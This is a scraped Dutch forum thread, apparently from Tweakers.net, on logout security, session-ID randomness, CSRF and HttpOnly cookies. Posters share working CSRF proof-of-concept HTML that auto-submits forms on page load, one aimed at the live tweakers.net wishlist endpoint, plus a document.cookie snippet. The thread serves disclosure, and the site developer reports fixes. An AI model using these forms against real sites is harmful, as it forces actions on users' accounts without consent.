Veiligheid GET/POST bij uitlog functie *

EdwinG schreef op woensdag 24 maart 2010 @ 20:21:
Waar in de uitlogpagina vindt je een sessie-id als parameter?

Een probleem met de manier waarop dat is opgebouwd is overigens dat ik een request kan forgen met daarin vele (honderdduizenden?) POST parameters met namen in de vorm van 'delete[willekeurigsessieid]', die elk de waarde '1' hebben. Elke geldige sessie-ID van de getroffen gebruiker die er tussen zit resulteerd dan in een uitgelogde sessie.

EdwinG schreef op woensdag 24 maart 2010 @ 20:21:
Een probleem met de manier waarop dat is opgebouwd is overigens dat ik een request kan forgen met daarin vele (honderdduizenden?)

Soultaker schreef op woensdag 24 maart 2010 @ 20:43:
Het zijn 32 hexadecimale karakters, oftewel 128 bits aan entropie. (Misschien een MD5 hash van wat interne state, of gewoon een soort GUID). De kans dat je die goed gokt is toch wel verwaarloosbaar klein, zelfs als je vele ids in één request stopt.

Voutloos schreef op woensdag 24 maart 2010 @ 20:44:
Het aantal mogelijke sessieids hier is:2¹²⁸, oftewel 3.4 × 10³⁸. Sterkte.

[Voor 72% gewijzigd door sanzut op 24-03-2010 21:03]

Soultaker schreef op woensdag 24 maart 2010 @ 20:43:
Het zijn 32 hexadecimale karakters, oftewel 128 bits aan entropie. (Misschien een MD5 hash van wat interne state, of gewoon een soort GUID). De kans dat je die goed gokt is toch wel verwaarloosbaar klein, zelfs als je vele ids in één request stopt.

.oisyn schreef op woensdag 24 maart 2010 @ 22:08:
[...]

Hier heb ik het al eens met crisp of ACM over gehad. T.net's sessie id was gewoon 32 random hex digits uit een PRNG. De entropie kwam puur en alleen uit de initiele seed van PHP, en die is niet zo best (huidige tijd en process id). Ik geloof dat er inmiddels nav die discussie /dev/urandom wordt gebruikt

[Voor 3% gewijzigd door Voutloos op 25-03-2010 08:37]

.oisyn schreef op woensdag 24 maart 2010 @ 22:08:
Hier heb ik het al eens met crisp of ACM over gehad. T.net's sessie id was gewoon 32 random hex digits uit een PRNG. De entropie kwam puur en alleen uit de initiele seed van PHP, en die is niet zo best (huidige tijd en process id). Ik geloof dat er inmiddels nav die discussie /dev/urandom wordt gebruikt

[Voor 20% gewijzigd door EdwinG op 27-03-2010 12:13]

Voutloos schreef op donderdag 25 maart 2010 @ 08:37:
Nou ja, je moet het pas zelf doen als je weet wat je doet. Ik vrees alleen dat hele volksstammen seed(time()); doen.

Voutloos schreef op vrijdag 26 maart 2010 @ 10:19:
Overigens sluit het gebruiken van OpenID of OAuth absoluut niet dit soort fouten uit.

En al doe je het goed, dan nog is het geen excuus voor het niet kennen van het HTTP protocol.

Woy schreef op vrijdag 26 maart 2010 @ 10:25:
[...]

Het is ook echt niet zo triviaal om een goede seed te genereren buiten de tijd. Je kan er van alles aan toevoegen, maar dat werkt ook alleen als je doordat het niet bekend is wat je er aan toe voegt.

Hipska schreef op vrijdag 26 maart 2010 @ 10:27:
Wat bedoel je hier mee? Bedoel je hiermee dat ik het HTTP protocol niet zou kennen of iets dergelijks?
Als je de HTTP specificaties erop na leest is een POST voor uit te loggen ook niet echt een correcte manier volgens mij. Logischer lijkt mij een DELETE naar /OpenID/Sessions/123456789abcdef, wat namelijk zou inhouden dat die resource verwijdert zal worden..

[Voor 8% gewijzigd door CodeCaster op 26-03-2010 10:55]

[Voor 28% gewijzigd door Anoniem: 343818 op 26-03-2010 11:02]

[Voor 69% gewijzigd door .oisyn op 26-03-2010 11:07]

.oisyn schreef op woensdag 24 maart 2010 @ 22:08:
Hier heb ik het al eens met crisp of ACM over gehad. T.net's sessie id was gewoon 32 random hex digits uit een PRNG. De entropie kwam puur en alleen uit de initiele seed van PHP, en die is niet zo best (huidige tijd en process id). Ik geloof dat er inmiddels nav die discussie /dev/urandom wordt gebruikt

Anoniem: 343818 schreef op vrijdag 26 maart 2010 @ 10:54:
Hoe ver mag je gaan met testen op Tweakers.net? (Als in, ik plaats hier in dit topic iets, waardoor iedereen wordt uitgelogd bij wijze van. Krijg ik dan een (perm) ban? )

Olaf van der Spek schreef op vrijdag 26 maart 2010 @ 11:11:
[...]

Waarom initialiseren C++ en PHP de PNRG niet gewoon zelf? Dan hoeft de app zich daar tenminste niet zelf druk over te maken.

[Voor 70% gewijzigd door .oisyn op 26-03-2010 11:14]

.oisyn schreef op vrijdag 26 maart 2010 @ 11:02:
Misschien moet je dat testen niet hier doen, maar in een DM thread oid. Bijv. naar BC3 Victim, die leest het toch niet . En voor het plaatsen van een linkje hier zonder dat je het verdoezelt lijkt het me vrij belachelijk dat daar sancties op staan.

.oisyn schreef op vrijdag 26 maart 2010 @ 10:38:
[...]
Wil je meer, dan zul je meerdere PRNG instances met elk verschillende seeds moeten gebruiken.

[Voor 23% gewijzigd door Woy op 26-03-2010 11:50]

.oisyn schreef op vrijdag 26 maart 2010 @ 11:14:
PHP doet dat dus met de huidige tijd en het process id.

[Voor 20% gewijzigd door Olaf van der Spek op 26-03-2010 12:06]

Olaf van der Spek schreef op vrijdag 26 maart 2010 @ 11:57:
[...]

Ik bedoel op een fatsoenlijke manier. Hmm, zelf heb ik "srand(static_cast<int>(time(NULL)));"...
Toch maar eens kijken of Boost niet iets heeft.

Matis schreef op vrijdag 26 maart 2010 @ 11:56:
Daar hebben ze toch van die hele dure hardwarematige random-seed insteekkaarten voor?

[Voor 40% gewijzigd door Woy op 26-03-2010 12:12]

Olaf van der Spek schreef op vrijdag 26 maart 2010 @ 11:57:
[...]

Ik bedoel op een fatsoenlijke manier. Hmm, zelf heb ik "srand(static_cast<int>(time(NULL)));"...
Toch maar eens kijken of Boost niet iets heeft.

[Voor 53% gewijzigd door .oisyn op 26-03-2010 12:20]

Woy schreef op vrijdag 26 maart 2010 @ 12:10:
Maar wat had jij dan voor idee voor een "fatsoenlijke" manier?

Olaf van der Spek schreef op vrijdag 26 maart 2010 @ 13:04:
[...]

Bijvoorbeeld op basis van /dev/urandom.

EdwinG schreef op donderdag 25 maart 2010 @ 19:03:
[...]


Wel jammer dat de sessie-id vervolgens niet gebruikt wordt als verplichte POST parameter of waarde, waardoor

Modbreak:

Deze linkt logt je uit. Op eigen risico dus
CSRF mogelijk is.

Soultaker schreef op zaterdag 27 maart 2010 @ 02:51:
Mooi. Maar ik denk wel dat er nog heel wat meer formulieren kwetsbaar zijn voor dit soort attacks!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

<html>
  <head>
    <script type="text/javascript">
      function loguit() {
        document.forms.uitgang.submit();
      }
    </script>
    <title>Log eens uit</title>
  </head>
  <body onload="loguit()">
    <form method="post" name="uitgang" action="http://target">
      <input type="hidden" name="logout" value="1" />
      <input type="hidden" name="option" value="this" />
    </form>
  </body>
</html>

crisp schreef op zaterdag 27 maart 2010 @ 00:18:
Inmiddels fixed

[Voor 6% gewijzigd door EdwinG op 27-03-2010 09:59]

Soultaker schreef op zaterdag 27 maart 2010 @ 02:51:
Mooi. Maar ik denk wel dat er nog heel wat meer formulieren kwetsbaar zijn voor dit soort attacks!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

<html>
  <head>
    <script type="text/javascript">
      function meukee() {
        document.forms.list_wishlist.submit();
      }
    </script>
    <title>Wishlist</title>
  </head>
  <body onload="meukee()">
    <form action="http://tweakers.net/gallery/?Action=addproducttocollection" id="list_wishlist" method="POST">
    <input name="productId" value="237510" type="hidden">
    <input name="cn" value="muwhaha" type="hidden">
    <input name="t" value="wishlist" type="hidden">
    <input name="av" value="" type="hidden">
    </form>
  </body>
</html>

[Voor 5% gewijzigd door Xander op 27-03-2010 12:31]

Soultaker schreef op zaterdag 27 maart 2010 @ 02:51:
Mooi. Maar ik denk wel dat er nog heel wat meer formulieren kwetsbaar zijn voor dit soort attacks!

crisp schreef op zaterdag 27 maart 2010 @ 12:13:
[...]

Ik denk dat de meeste sites op plekken wel kwetsbaar zijn voor CSRF.

Janoz schreef op woensdag 24 maart 2010 @ 18:10:
[...]
Google is gestopt omdat ze inderdaad tegen het probleem aanliepen dat het web stikt van de brakke webapplicaties. Zij kregen klachten dat hun web accelerators er voor zorgde dat gebruikers werden gebanned of topics werden verwijderd. Mij lijkt dat meer de fout van een brakke forum implementatie.

1

<a class="e a7 ou" id=":r6" href="?logout&amp;hl=en" target="_top">Sign out</a>

Soultaker schreef op vrijdag 26 maart 2010 @ 14:21:
Wat wil je er nu precies mee doen? Als het gaat om het genereren van een 128-bits sessie-id kun je gewoon 16 bytes uit /dev/random of /dev/urandom trekken. Helaas niet helemaal platformneutraal. (Dat suggereerde .oisyn ook al trouwens.)

[Voor 65% gewijzigd door RobIII op 28-03-2010 00:40]

Xander schreef op zaterdag 27 maart 2010 @ 12:38:
[...]
En vervolgens zijn ze zelf ook brakke applicaties gaan bouwen waar hun eigen accelerator mee in de problemen zou komen?

Van gmail:

HTML:

1	<a class="e a7 ou" id=":r6" href="?logout&amp;hl=en" target="_top">Sign out</a>

RobIII schreef op zondag 28 maart 2010 @ 00:22:
Nu weet ik niet of T.net iets doet met het TNetID in JS, maar ik kan zo snel niets bedenken. Voor eventuele XSS aanvallen zou dit al (enige mate van) extra bescherming bieden.

RobIII schreef op zondag 28 maart 2010 @ 00:22:
[...]
Nu weet ik niet of T.net iets doet met het TNetID in JS, maar ik kan zo snel niets bedenken. Voor eventuele XSS aanvallen zou dit al (enige mate van) extra bescherming bieden.

[Voor 32% gewijzigd door crisp op 28-03-2010 01:10]

crisp schreef op zondag 28 maart 2010 @ 00:54:
Wij gebruiken TnetID uit de cookie in onze Ajax-interface bij POST-requests

[Voor 18% gewijzigd door RobIII op 28-03-2010 01:07]

RobIII schreef op zondag 28 maart 2010 @ 01:05:
[...]

Dat is toch helemaal niet nodig? XMLHTTP stuurt afaik gewoon je cookies mee. Dan hoef je toch niet expliciet de values die in een cookie staan nog eens te setten?

crisp schreef op zondag 28 maart 2010 @ 00:54:
Wat Pedorus hierboven dus ook al zegt: als je het sessie-id opneemt in formulieren om CSRF te voorkomen dan heeft http-only voor je cookie weinig nut. Alternatief is een per-page uniek token met een korte TTL. Dat doen we al op de frontpage bij de reacties, maar dat is een behoorlijke overhead op de database cq memcached omdat 99% van die tokens ueberhaupt nooit gebruikt worden.

[Voor 39% gewijzigd door pedorus op 28-03-2010 01:13]

pedorus schreef op zondag 28 maart 2010 @ 01:08:
[...]

Maar dan weet je nog niet of de request wel vanaf je eigen site komt, want vanaf een andere site krijg je natuurlijk ook je eigen cookies terug (CSRF).

RobIII schreef op zondag 28 maart 2010 @ 01:14:
[...]

Oh, zo ja. Ja, d'uh.
Het ging er mij om dat een beetje 'scriptkiddie' / 'bot' die om welke reden dan ook een XSS post ergens in gevlamd krijgt niet zomaar een document.cookie value kan doorsturen. Het is dan ook maar, zoals ik zei, een (weliswaar dun) laagje extra protectie.

crisp schreef op zondag 28 maart 2010 @ 01:20:
[...]

Je sessie locken op IP helpt ook al daartegen

Olaf van der Spek schreef op zondag 28 maart 2010 @ 16:29:
[...]
Dat is geen oplossing als je IP adres niet voor elk request hetzelfde is.

[Voor 23% gewijzigd door Trucker Her op 28-03-2010 18:06]

Trucker Her schreef op zondag 28 maart 2010 @ 18:05:
[afbeelding]

Soultaker schreef op maandag 29 maart 2010 @ 10:13:
Oh, die ja. Wat doet dat eigenlijk, behalve de hitcounters resetten?

crisp schreef op zaterdag 27 maart 2010 @ 12:13:
Ik denk dat de meeste sites op plekken wel kwetsbaar zijn voor CSRF.

BTW, kudos @crisp voor het razendsnel fixen van deze bugs. En ik maar denken dat developers die snel en positief reageren op bugreports een fata morgana waren.

netvor schreef op maandag 29 maart 2010 @ 11:20:
Waarom wordt CSRF zo onderschat? Waarschijnlijk omdat de impact minder desastreus is: met een goede SQL injection attack kan je een hele site platleggen of een lijst van alle users incl. emailadressen bemachtigen. Met CSRF val je vaak maar één user aan, en de actie blijft beperkt tot iets dat die user zelf toch al kon doen.

RobIII schreef op zondag 28 maart 2010 @ 00:22:
Overigens, nog een tip om je cookies wat beter in de hand te houden: http://www.codinghorror.c...our-cookies-httponly.html

Ik kan, op T.net bijv., met JS het TNetID uitlezen (plak in je adresbalk: [html]<span style="font-family:courier;">javascript:alert(document.cookie);</span>[/html] of [html]<a href="#" onclick="alert(document.cookie); return false;">Klik hier!</a>[/html] en zie (o.a.) je TNetID). Als die cookie met HttpOnly gezet was kon je 'm met JS niet eens uitlezen.

Nu weet ik niet of T.net iets doet met het TNetID in JS, maar ik kan zo snel niets bedenken. Voor eventuele XSS aanvallen zou dit al (enige mate van) extra bescherming bieden.

[Voor 8% gewijzigd door .oisyn op 29-03-2010 12:24]

.oisyn schreef op maandag 29 maart 2010 @ 12:20:
[...]


Met HttpOnly gooi je gelijk de deur dicht voor browser extensions die wat speciaals met de site doen (zo heb ik het tnetid nodig om de instellingen van m'n chrome extension (zie sig, al is die feature nog niet live) te synchroniseren met je bookmarks en notepad)

Soultaker schreef op maandag 29 maart 2010 @ 04:21:
Nee hoor, ook niet.

Zelfs dat bericht versturen met die [img] tag in de [code] tag zorgde er voor dat mijn forumsessie gereset werd, blijkbaar werkt die check images functie ook binnen code-tags.

Soultaker schreef op maandag 29 maart 2010 @ 10:13:
Oh, die ja. Wat doet dat eigenlijk, behalve de hitcounters resetten?

Trucker Her schreef op zondag 28 maart 2010 @ 18:07:
Tis dus alleen even ter illustratie dat het op tweakers niet zo werkt.. Omdat ze de afbeeldingen controleren!

Xander schreef op maandag 29 maart 2010 @ 13:54:
He, je denkt toch niet dat ik zoiets beweer zonder het uit te proberen.

[Voor 8% gewijzigd door Soultaker op 17-04-2010 05:27]

[Voor 46% gewijzigd door Voutloos op 17-04-2010 09:57]

Soultaker schreef op zaterdag 17 april 2010 @ 03:10:
Leuke aanpak. De keuze om tokens te versleutelen zodat je ze niet hoeft op te slaan ligt voor de hand, maar ik vraag me af wat de meerwaarde is van het opslaan van gebruikte tokens in de database. Ik snap dat je op die manier replay attacks kunt voorkomen, maar wat is daar het voordeel van als een attacker net zo lief een ongebruikte token in handen zou krijgen?

Voutloos schreef op zaterdag 17 april 2010 @ 09:50:
en ook bij deze oplossing kan je de verouderde entries uit de tabel verwijderen.

[Voor 16% gewijzigd door Olaf van der Spek op 17-04-2010 10:49]

[Voor 3% gewijzigd door Voutloos op 17-04-2010 10:52]

Olaf van der Spek schreef op zaterdag 17 april 2010 @ 10:47:
Het punt is juist dat er geen tabel meer (nodig) is, dat nee, dat kan niet.
Nu moet je gebruikte tokens juist in de tabel zetten zodat ze niet nog een keer gebruikt kunnen worden.

[Voor 4% gewijzigd door ACM op 17-04-2010 11:02]

En die 36000 werden dan 24 uur later ook weer verwijderd uit die tabel (piekuur de volgende dag...).

[Voor 8% gewijzigd door Anoniem: 26306 op 17-04-2010 11:14]

Anoniem: 26306 schreef op zaterdag 17 april 2010 @ 11:09:
Misschien is 24 uur dan ook niet de meest handige geldigheidsduur van zo'n token

ACM schreef op zaterdag 17 april 2010 @ 10:37:
Het heeft een veel praktischer en vaker voorkomende reden. Voorkomen dat een dubbel opgestuurd formulier een tweede keer verwerkt wordt, bijvoorbeeld doordat men dubbelklikt op de submitbutton bij een reactieformulier.

Anoniem: 26306 schreef op zaterdag 17 april 2010 @ 11:09:
Een token is dan alleen opnieuw te gebruiken als precies dezelfde state nog eens voorkomt. En dat gebeurt niet als je bijvoorbeeld "laatst gewijzigd op"-velden meeneemt in de "checksum".

netvor schreef op maandag 19 april 2010 @ 11:00:
Ik zie echter een knelpunt bij het vermijden van double-submit. Voor het wijzigen van reacties werkt dit systeem perfect, zoals je zelf al schrijft, maar hoe kun je double-submit vermijden voor acties die de context niet wijzigen? Neem als voorbeeld het plaatsen van een nieuwe reactie op een blogpost.

Soultaker schreef op zaterdag 17 april 2010 @ 20:40:
Ah, daar is het natuurlijk wel nuttig voor. Ik vraag me wel af welke faalbrowsers heden ten dage nog POST requests dubbel versturen zonder expliciete bevestiging van de gebruiker (Firefox in ieder geval niet) maar goed, het kan geen kwaad om er iets tegen te doen.

[Voor 29% gewijzigd door Olaf van der Spek op 19-04-2010 17:42]

Soultaker schreef op maandag 19 april 2010 @ 17:52:
AFAIK begint Firefox een POST request de eerste keer dat je klinkt en negeert 'ie verdere clicks op diezelfde button. Als je een pagina die het resultaat van een POST request was probeert te reloaden vraagt 'ie eerst om bevestiging, dus dan krijg je alleen een extra request als de gebruiker het écht wil (maar dat kan altijd natuurlijk).

Olaf van der Spek schreef op maandag 19 april 2010 @ 17:41:
[...]

Het voorkomen van dubbele posts is toch eenvoudig? Daar heb je helemaal geen tokens voor nodig. Gewoon controleren of die post al in de database zit...

[Voor 29% gewijzigd door .oisyn op 19-04-2010 17:58]

[Voor 24% gewijzigd door BarôZZa op 19-04-2010 18:01]

[Voor 55% gewijzigd door .oisyn op 19-04-2010 18:41]

BarôZZa schreef op maandag 19 april 2010 @ 20:02:
Nee, want dan kan 1 eerst tab 1 submitten, dan tab 2 en als je dan de backbutton gebruikt van tab 1, dan submit hij hem weer .

BarôZZa schreef op maandag 19 april 2010 @ 20:02:
De enige echte oplossing is voor elke request een aparte token maken die na een tijdje vervalt, maar dan loop je het risico dat je site een stuk trager wordt en je een flinke db krijgt, aangezien maar een klein deel van de tokens gebruikt zou worden.

BarôZZa schreef op maandag 19 april 2010 @ 20:02:
Nee, want dan kan 1 eerst tab 1 submitten, dan tab 2 en als je dan de backbutton gebruikt van tab 1, dan submit hij hem weer .

.oisyn schreef op maandag 19 april 2010 @ 17:57:
Dus als jij een vraag stelt, en ik antwoord met "nee", en jij stelt nog een vraag, dan mag ik niet nog een keer met "nee" antwoorden?

[Voor 35% gewijzigd door Olaf van der Spek op 19-04-2010 20:58]